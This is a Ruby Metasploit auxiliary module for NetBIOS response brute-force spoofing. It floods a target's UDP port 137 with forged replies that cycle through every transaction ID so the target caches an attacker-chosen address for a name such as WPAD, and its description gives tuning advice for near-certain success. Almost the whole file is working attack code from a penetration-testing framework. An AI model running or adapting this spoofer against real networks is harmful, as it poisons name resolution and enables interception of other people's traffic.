## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp def initialize super( 'Name' => 'NetBIOS Response Brute Force Spoof (Direct)', 'Description' => %q{ This module continuously spams NetBIOS responses to a target for given hostname, causing the target to cache a malicious address for this name. On high-speed local networks, the PPSRATE value should be increased to speed up this attack. As an example, a value of around 30,000 is almost 100% successful when spoofing a response for a 'WPAD' lookup. Distant targets may require more time and lower rates for a successful attack. }, 'Author' => [ 'vvalien', # Metasploit Module (post) 'hdm', # Metasploit Module 'tombkeeper' # Related Work ], 'License' => MSF_LICENSE, ) register_options( [ Opt::RPORT(137), OptString.new('NBNAME', [ true, "The NetBIOS name to spoof a reply for", 'WPAD' ]), OptAddress.new('NBADDR', [ true, "The address that the NetBIOS name should resolve to", Rex::Socket.source_address("") ]), OptInt.new('PPSRATE', [ true, "The rate at which to send NetBIOS replies", 1_000]) ], self.class ) end def netbios_spam payload = "\xff\xff" + # TX ID (will brute force this) "\x85\x00" + # Flags = response + authoritative + recursion desired "\x00\x00" + # Questions = 0 "\x00\x01" + # Answer RRs = 1 "\x00\x00" + # Authority RRs = 0 "\x00\x00" + # Additional RRs = 0 "\x20" + Rex::Proto::SMB::Utils.nbname_encode( [@fake_name.upcase].pack("A15") + "\x00" ) + "\x00" + "\x00\x20" + # Type = NB "\x00\x01" + # Class = IN "\x00\x04\x93\xe0" + # TTL long time "\x00\x06" + # Datalength = 6 "\x00\x00" + # Flags B-node, unique Rex::Socket.addr_aton(@fake_addr) stime = Time.now.to_f pcnt = 0 pps = 0 print_status("Spamming NetBIOS responses for #{@fake_name}/#{@fake_addr} to #{@targ_addr}:#{@targ_port} at #{@targ_rate}/pps...") live = true while live 0.upto(65535) do |txid| begin payload[0,2] = [txid].pack("n") @sock.put(payload) pcnt += 1 pps = (pcnt / (Time.now.to_f - stime)).to_i if pps > @targ_rate sleep(0.01) end rescue Errno::ECONNREFUSED print_error("Error: Target sent us an ICMP port unreachable, port is likely closed") live = false break end end end print_status("Cleaning up...") end def run connect_udp @sock = self.udp_sock @targ_addr = rhost @targ_port = rport @targ_rate = datastore['PPSRATE'] @fake_name = datastore['NBNAME'] @fake_addr = datastore['NBADDR'] netbios_spam disconnect_udp end end